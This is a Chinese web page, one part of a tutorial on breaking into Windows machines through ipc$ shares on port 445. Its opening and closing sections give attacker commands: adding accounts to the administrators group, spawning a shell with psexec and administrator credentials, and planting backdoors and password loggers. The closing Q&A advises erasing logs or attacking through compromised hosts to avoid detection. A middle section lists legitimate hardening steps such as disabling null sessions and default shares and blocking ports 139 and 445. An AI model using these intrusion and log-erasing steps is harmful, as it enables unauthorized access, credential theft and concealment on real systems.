锐客网

  1. 首页 > 睿知 > >

445端口入侵详解 445端口入侵教程( 六 )

生活经验经验知识


C:WINNTsystem32>net localgroup administrators 帐户名 /add
telnet 上以后,你可以建立新帐户,激活 guest  , 把任何帐户加入管理员组等
好了,写到这里我似乎回到了 2 ,3 年前,那时的 ipc$ 大家都是这么用的,不过随着新工具的出现,上面提到的一些工具和命令现在已经不常用到了,那就让我们看看现在的高效而简单的 ipc$ 入侵吧 。
[1]
psexec.exe IP -u 管理员帐号 -p 密码 cmd
用这个工具我们可以一步到位的获得 shell
OpenTelnet.exe server 管理员帐号 密码 NTLM 的认证方式 port
用它可以方便的更改 telnet 的验证方式和端口,方便我们登陆
[2]
已经没有第二步了,用一步获得 shell 之后,你做什么都可以了,安后门可以用 winshell,克隆就用 ca 吧,开终端用 3389.vbe ,记录密码用 win2kpass ,总之好的工具不少 , 随你选了,我就不多说了 。
十四 如何防范 ipc$ 入侵
1 禁止空连接进行枚举 ( 此操作并不能阻止空连接的建立 )
运行 regedit ,找到如下主键 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA] 把 RestrictAnonymous = DWORD 的键值改为: 1
如果设置为 "1" ,一个匿名用户仍然可以连接到 IPC$ 共享,但无法通过这种连接得到列举 SAM 帐号和共享信息的权限;在 Windows2000 中增加了 "2" ,未取得匿名权的用户将不能进行 ipc$ 空连接 。建议设置为 1 。如果上面所说的主键不存在,就新建一个再改键值 。如果你觉得改注册表麻烦 , 可以在本地安全设置中设置此项: 在本地安全设置-本地策略-安全选项-' 对匿名连接的额外限制 '
2 禁止默认共享
1 )察看本地共享资源
运行 -cmd- 输入 net share
2 )删除共享(重起后默认共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (如果有 e,f, ……可以继续删除)
3 )停止 server 服务
net stop server /y (重新启动后 server 服务会重新开启)
4 )禁止自动打开默认共享(此操作并不能关闭 ipc$ 共享)
运行 -regedit
server 版 : 找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把 AutoShareServer ( DWORD )的键值改为 :00000000。
pro 版 : 找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把 AutoShareWks ( DWORD )的键值改为 :00000000。
这两个键值在默认情况下在主机上是不存在的,需要自己手动添加,修改后重起机器使设置生效 。
3 关闭 ipc$ 和默认共享依赖的服务 :server 服务
如果你真的想关闭 ipc$ 共享,那就禁止 server 服务吧:
控制面板 - 管理工具 - 服务 - 找到 server 服务(右击) - 属性 - 常规 - 启动类型 - 选已禁用 , 这时可能会有提示说: XXX 服务也会关闭是否继续,因为还有些次要的服务要依赖于 server 服务 , 不要管它 。
4 屏蔽 139,445 端口
由于没有以上两个端口的支持,是无法建立 ipc$ 的 , 因此屏蔽 139 , 445 端口同样可以阻止 ipc$ 入侵 。
1 ) 139 端口可以通过禁止 NBT 来屏蔽
本地连接- TCP/IT 属性-高级- WINS -选‘禁用 TCP/IT 上的 NETBIOS '一项
2 ) 445 端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: SystemControlsetServicesNetBTParameters
Name: SMBDeviceEnabled
Type: REG_DWORD
value: 0
修改完后重启机器
注意:如果屏蔽掉了以上两个端口 , 你将无法用 ipc$ 入侵别人 。
3 )安装防火墙进行端口过滤
6 设置复杂密码,防止通过 ipc$ 穷举出密码 , 我觉得这才是最好的办法,增强安全意识,比不停的打补丁要安全的多 。
十五 ipc$ 入侵问答精选
上面说了一大堆的理论东西,但在实际中你会遇到各种各样的问题,因此为了给予大家最大的帮助,我整理了各大安全论坛中一些有代表性的问答,其中的一些答案是我给出的,一些是论坛上的回复 , 如果有什么疑问 , 可以来找我讨论 。
1. 进行 ipc$ 入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器发现吗?
答:留下记录是一定的,你走后用清除日志程序删除就可以了,或者用肉鸡入侵 。
2. 你看下面的情况是为什么,可以连接但不能复制
net use ***.***.***.***ipc$ " 密码 " /user:" 用户名 "
命令成功
copy icmd.exe ***.***.***.***admin$
找不到网络路径
命令不成功

推荐阅读


上一篇:打印机端口如何设置 打印机输出端口怎么设置

下一篇:TCP/IP中3688端口是什么? 36984端口